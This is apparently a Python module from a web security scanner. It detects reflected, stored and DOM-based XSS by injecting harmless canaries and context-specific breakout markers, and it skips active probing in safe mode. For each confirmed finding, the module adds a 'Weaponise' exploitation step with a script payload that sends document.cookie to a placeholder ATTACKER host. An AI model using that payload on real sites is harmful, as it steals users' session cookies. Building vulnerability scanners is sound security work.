"""
xss_detect — context-aware XSS detection on URL parameters and form fields (reflected, stored
and DOM-based).

Three passes, escalating in fidelity:
  1. Reflected — inject a harmless alphanumeric canary and find WHERE it is reflected (HTML text,
     an HTML attribute, inside a <script> string, or an HTML comment), then inject the minimal
     breakout sequence for that context and check whether it survives unencoded. A successful
     breakout is a real reflected XSS (High); an encoded reflection is reported Low.
  2. Stored (server-rendered) — submit a form field, then look for the value on a *display* page
     (not just the submission's own response) and confirm a breakout there → High Stored XSS.
  3. DOM-based / stored (browser-verified) — an optional Playwright pass (see scanner/vulns/dom_xss.py)
     that drives headless Chromium to catch payloads written into the DOM by client-side JS
     (e.g. innerHTML), which never appear in the server HTML and only execute in a real browser.

The reflected/stored passes detect reflection/breakout (no JS execution, no CSP bypass); the optional
browser pass confirms actual execution. Active probing is skipped in safe mode.
"""
from __future__ import annotations

import re
import uuid
from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import Callable
from urllib.parse import parse_qs, urlencode, urlparse, urlunparse

import httpx
from loguru import logger

from scanner import browser as br
from scanner import evidence as ev
from scanner.crawler import Form, fresh_form_fields
from scanner.engine import Finding, Severity, ScanEngine
from scanner.vulns import dom_xss

MODULE = "xss_detect"

_ENCODED = ("&lt;", "&gt;", "&quot;", "&#x27;", "&#39;", "&amp;", "%3c", "%3e")

# A WAF/CDN block page often reflects the payload but is NOT code execution — never report XSS on it.
_BLOCK_STATUS = frozenset({401, 403, 406, 429, 503})
_BLOCK_SIGNS = (
    "request could not be satisfied", "generated by cloudfront", "request blocked",
    "access denied", "attention required", "incapsula incident", "the requested url was rejected",
    "this request has been blocked", "web page blocked", "blocked by",
)

InjectFn = Callable[[str], "httpx.Response | None"]


def _looks_blocked(resp: "httpx.Response | None") -> bool:
    """True if the response is a WAF/CDN block or error page rather than the application."""
    if resp is None:
        return True
    if resp.status_code in _BLOCK_STATUS:
        return True
    low = resp.text[:3000].lower()
    return any(s in low for s in _BLOCK_SIGNS)


# ---------------------------------------------------------------------------
# Context classification
# ---------------------------------------------------------------------------

def _enclosing_quote(segment: str) -> str:
    if segment.count('"') % 2 == 1:
        return '"'
    if segment.count("'") % 2 == 1:
        return "'"
    return ""


def _classify_context(html: str, canary: str) -> set[str]:
    """Return the reflection context(s) of *canary* in *html*."""
    contexts: set[str] = set()
    for m in re.finditer(re.escape(canary), html):
        before = html[:m.start()]
        if before.rfind("<!--") > before.rfind("-->"):
            contexts.add("comment")
        elif before.rfind("<script") > before.rfind("</script"):
            seg = before[before.rfind("<script"):]
            # strip the opening tag so its quotes don't skew the count
            seg = seg.split(">", 1)[1] if ">" in seg else seg
            contexts.add("js_string" if _enclosing_quote(seg) else "js")
        elif before.rfind("<") > before.rfind(">"):
            q = _enclosing_quote(before[before.rfind("<"):])
            contexts.add("attr_double" if q == '"' else "attr_single" if q == "'" else "attr_unquoted")
        else:
            contexts.add("html_text")
    return contexts


def _breakout(ctx: str, nonce: str) -> tuple[str, Callable[[str], bool]]:
    """Return (payload, success_check) that proves a breakout from *ctx*."""
    tag = f"<q{nonce}>"
    if ctx in ("html_text", "html"):
        return tag, lambda t: tag in t
    if ctx == "comment":
        return "-->" + tag, lambda t: ("-->" + tag) in t
    if ctx == "attr_double":
        return '">' + tag, lambda t: ('">' + tag) in t
    if ctx == "attr_single":
        return "'>" + tag, lambda t: ("'>" + tag) in t
    if ctx == "attr_unquoted":
        return f" onq{nonce}=1>{tag}", lambda t: tag in t
    if ctx == "js":
        payload = f";q{nonce}();"
        pat = re.compile(r"<script\b[^>]*>(?:(?!</script>).)*?" + re.escape(payload), re.I | re.S)
        return payload, lambda t: pat.search(t) is not None
    if ctx == "js_string":
        # The breakout must land INSIDE a <script> block with the quote unescaped — a bare reflection
        # of "';q{nonce}" elsewhere on the page (HTML text, an error/WAF page) is not code execution.
        payload = f"';q{nonce}='"
        pat = re.compile(r"<script\b[^>]*>(?:(?!</script>).)*?(?<!\\)';q" + re.escape(nonce), re.I | re.S)
        return payload, lambda t: pat.search(t) is not None
    return tag, lambda t: tag in t


_CTX_LABEL = {
    "html_text": "HTML text", "html": "HTML", "comment": "HTML comment",
    "attr_double": 'double-quoted attribute', "attr_single": "single-quoted attribute",
    "attr_unquoted": "unquoted attribute", "js": "inline <script>", "js_string": "JS string",
}


# ---------------------------------------------------------------------------
# Finding factory
# ---------------------------------------------------------------------------

def _finding(where: str, ctx: str, payload: str, severity: Severity, confidence: str,
             proof_url: str | None = None, evidence: list[str] | None = None,
             kind: str = "Reflected") -> Finding:
    verb = "stored and reflected" if kind == "Stored" else "reflected"
    if severity == Severity.LOW:
        title = f"{kind} Input (encoded): {where}"
        desc = (f"Input to {where} is {verb} in the response but its special characters are "
                "encoded, so it is likely not exploitable. Verify the exact context manually.")
    else:
        title = f"{kind} XSS: {where} [{_CTX_LABEL.get(ctx, ctx)}]"
        desc = (f"Input to {where} is {verb} in a {_CTX_LABEL.get(ctx, ctx)} context and a breakout "
                f"payload survived unencoded (payload: {payload!r}). This is an exploitable "
                f"{kind.lower()} XSS.")
        if proof_url:
            desc += ("\n\nThe clickable proof link opens the injected request — in a browser it may "
                     "execute the payload (e.g. pop an alert). Verify/exploit with dalfox:\n"
                     f'  dalfox url "{proof_url}"')
    raw = {"location": where, "context": ctx, "payload": payload, "confidence": confidence,
           "evidence": evidence or [f"injected into {where}: {ev.note(payload)[:80]}"]}
    if proof_url:
        raw["proof_url"] = proof_url
    # Only a confirmed (breakout) reflected XSS is exploitable — the encoded LOW case is not.
    if severity != Severity.LOW:
        target = proof_url or "<the injected request>"
        raw["exploitation"] = [
            {"step": 1, "description": "Confirm execution and auto-discover working payloads.",
             "command": f'dalfox url "{target}"'},
            {"step": 2, "description": "Weaponise: exfiltrate the victim's session cookie to your server.",
             "command": '<script>new Image().src="https://ATTACKER/c?"+document.cookie</script>'},
        ]
    return Finding(
        module=MODULE, title=title, description=desc,
        severity=severity,
        recommendation=("Context-encode all user input on output (HTML/attribute/JS/URL encoding as "
                        "appropriate), prefer auto-escaping templates, and add a strict Content-Security-Policy."),
        raw=raw,
    )


# ---------------------------------------------------------------------------
# Core test
# ---------------------------------------------------------------------------

def _probe(inject: InjectFn, where: str,
           proof: Callable[[str], str] | None = None) -> Finding | None:
    nonce = uuid.uuid4().hex[:10]
    canary = f"hx{nonce}"
    resp = inject(canary)
    # A blocked/WAF page that echoes the canary is not a reflection point we can trust.
    if resp is None or _looks_blocked(resp) or canary not in resp.text:
        return None

    for ctx in _classify_context(resp.text, canary):
        payload, success = _breakout(ctx, nonce)
        r2 = inject(payload)
        # The breakout must succeed on a real application response — not a WAF/CDN block page that
        # merely reflects the payload (e.g. a CloudFront "Request blocked" 403).
        if r2 is not None and not _looks_blocked(r2) and success(r2.text):
            proof_url = proof(payload) if proof else None
            evidence = [f"injected into {where}: {ev.note(payload)[:80]}"] + ev.from_response(
                r2, indicator=f"breakout survived unencoded in {_CTX_LABEL.get(ctx, ctx)} context")
            return _finding(where, ctx, payload, Severity.HIGH, "high", proof_url, evidence)

    # Reflected but no breakout achieved → likely encoded/sanitised.
    return _finding(where, "reflected", canary, Severity.LOW, "low",
                    evidence=[f"injected into {where}: {ev.note(canary)[:80]}"]
                    + ev.from_response(resp, indicator="canary reflected but special characters encoded"))


def _display_urls(engine: ScanEngine, form: Form) -> list[str]:
    """Pages where a stored form value is likely to resurface (deduped)."""
    urls: list[str] = []
    for u in (form.source_url, form.action, engine.url):
        if u and u not in urls:
            urls.append(u)
    return urls


def _probe_stored(engine: ScanEngine, form: Form, field: str) -> Finding | None:
    """Submit a form field, then look for the value on a *display* page (server-rendered stored XSS).

    The reflected probe only inspects the submission's own response; a stored XSS only resurfaces when
    a later page renders the saved value. This submits a canary, finds a display page that echoes it,
    then submits a context breakout and re-fetches that page to confirm it survives unencoded.
    Client-rendered sinks (value injected into the DOM by JS) won't appear here — that is the
    browser-verified pass's job.
    """
    inject = _form_injector(engine, form, field)
    nonce = uuid.uuid4().hex[:10]
    canary = f"hs{nonce}"
    if inject(canary) is None:
        return None

    target_url, base = None, None
    for url in _display_urls(engine, form):
        r = _get(engine, url)
        if r is not None and not _looks_blocked(r) and canary in r.text:
            target_url, base = url, r
            break
    if base is None:
        return None  # not stored server-side (or client-rendered → browser-verified pass)

    where = f"form field '{field}' ({form.method.upper()} {form.action}) → stored, rendered on {target_url}"
    for ctx in _classify_context(base.text, canary):
        payload, success = _breakout(ctx, nonce)
        inject(payload)
        r2 = _get(engine, target_url)
        if r2 is not None and not _looks_blocked(r2) and success(r2.text):
            evidence = [f"submitted to '{field}': {ev.note(payload)[:80]}",
                        f"breakout resurfaced unencoded on {target_url}"] + ev.from_response(
                r2, indicator=f"stored breakout survived in {_CTX_LABEL.get(ctx, ctx)} context")
            return _finding(where, ctx, payload, Severity.HIGH, "high", evidence=evidence, kind="Stored")

    # Stored and echoed, but special characters were encoded → not exploitable as-is.
    return _finding(where, "reflected", canary, Severity.LOW, "low", kind="Stored",
                    evidence=[f"submitted to '{field}': {ev.note(canary)[:80]}",
                              f"value stored and echoed on {target_url} but special characters encoded"]
                    + ev.from_response(base, indicator="stored value reflected but encoded"))


# ---------------------------------------------------------------------------
# Injection helpers
# ---------------------------------------------------------------------------

def _inject_url_param(url: str, param: str, payload: str) -> str:
    parsed = urlparse(url)
    params = parse_qs(parsed.query, keep_blank_values=True)
    params[param] = [payload]
    return urlunparse(parsed._replace(query=urlencode(params, doseq=True)))


def _get(engine: ScanEngine, url: str) -> httpx.Response | None:
    try:
        return engine.request("GET", url)
    except httpx.HTTPError as exc:
        logger.debug(f"xss_detect: {url} → {exc}")
        return None


def _url_injector(engine: ScanEngine, url: str, param: str) -> InjectFn:
    return lambda payload: _get(engine, _inject_url_param(url, param, payload))


def _form_injector(engine: ScanEngine, form: Form, field: str) -> InjectFn:
    def inject(payload: str) -> httpx.Response | None:
        # Refresh hidden tokens (ASP.NET __VIEWSTATE/__EVENTVALIDATION, CSRF) right before submitting,
        # so a stateful framework doesn't reject the postback with an error page that hides the payload.
        data = {**fresh_form_fields(engine, form), field: payload}
        try:
            if form.method == "post":
                return engine.request("POST", form.action, data=data)
            return engine.request("GET", form.action, params=data)
        except httpx.HTTPError as exc:
            logger.debug(f"xss_detect: form {form.action} → {exc}")
            return None
    return inject


# ---------------------------------------------------------------------------
# Entry point
# ---------------------------------------------------------------------------

def _input_name(text: str) -> str | None:
    """Pull the quoted input name from a finding location, e.g. "form field 'timer' (GET …)" → timer."""
    m = re.search(r"'([^']+)'", text or "")
    return m.group(1) if m else None


def run(engine: ScanEngine) -> list[Finding]:
    if engine.is_safe_mode():
        logger.info("xss_detect: safe mode — skipping")
        return [Finding(MODULE, "XSS Scan Skipped (Safe Mode)",
                        "Active XSS probing was skipped because safe mode is enabled.",
                        Severity.INFO, "Re-run without safe mode on an authorised target.",
                        {"reason": "safe_mode", "confidence": "high"})]

    crawl = engine.get_crawl()
    candidate_urls = list(crawl.parametrised_urls)
    if urlparse(engine.url).query and engine.url not in candidate_urls:
        candidate_urls.insert(0, engine.url)

    seen: set[str] = set()
    url_work: list[tuple[str, str]] = []
    for url in candidate_urls:
        for param in parse_qs(urlparse(url).query, keep_blank_values=True):
            if param not in seen:
                seen.add(param)
                url_work.append((url, param))

    form_work: list[tuple[Form, str]] = []
    for form in crawl.forms:
        for field in form.fields:
            if field not in seen:
                seen.add(field)
                form_work.append((form, field))

    findings: list[Finding] = []
    if url_work or form_work:
        with ThreadPoolExecutor(max_workers=engine.threads) as pool:
            futures = []
            for url, param in url_work:
                proof = (lambda payload, u=url, p=param: _inject_url_param(u, p, payload))
                futures.append(pool.submit(_probe, _url_injector(engine, url, param),
                                           f"URL parameter '{param}'", proof))
            for form, field in form_work:
                # POST forms have no shareable GET proof URL.
                futures.append(pool.submit(_probe, _form_injector(engine, form, field),
                                           f"form field '{field}' ({form.method.upper()} {form.action})"))
                # Stored pass: submit, then look for the value on a display page (server-rendered).
                futures.append(pool.submit(_probe_stored, engine, form, field))
            for future in as_completed(futures):
                result = future.result()
                if result:
                    findings.append(result)

    # Browser-verified DOM XSS — catches client-rendered sinks (innerHTML, location.hash…) that never
    # appear in the server HTML: the URL-fragment vector (e.g. XSS-game level 3, no form needed) and the
    # stored form vector (e.g. level 2). Optional: needs Playwright + Chromium and degrades to a single
    # INFO hint when the browser is unavailable.
    dom_pages = dom_xss.candidates(engine)
    if dom_pages:
        if br.ensure_chromium():
            verified_names: set[str] = set()
            for hit in dom_xss.verify(engine, dom_pages, url_work):
                findings.append(dom_xss.to_finding(hit))
                if hit.vector in ("param", "form"):
                    verified_names.add(_input_name(hit.field) or hit.field)
            # A browser-verified HIGH for an input supersedes the httpx "reflected but encoded" LOW for
            # the same input name (e.g. a GET form field feeding an event-handler attribute, where the
            # server entity-encodes the quote but the browser decodes it before running the JS).
            if verified_names:
                findings = [f for f in findings if not (
                    f.severity == Severity.LOW
                    and _input_name(f.raw.get("location") or "") in verified_names)]
        else:
            findings.append(Finding(
                MODULE, "DOM/Stored XSS Verification Skipped (no browser)",
                "A browser-verified XSS pass needs a headless browser. Install it with "
                "'pip install playwright && playwright install chromium' to verify DOM-based, stored and "
                "event-handler XSS (URL-fragment, form and reflected-parameter sinks) that an HTTP-only "
                "check can misread.",
                Severity.INFO, "", {"reason": "browser_unavailable", "confidence": "high"}))

    if not findings:
        total = len(url_work) + len(form_work)
        return [Finding(MODULE, "XSS: No Reflection Detected",
                        f"Tested {total} input(s) with context-aware + browser probes; nothing fired.",
                        Severity.INFO, "", {"inputs_tested": total, "confidence": "high"})]
    return findings
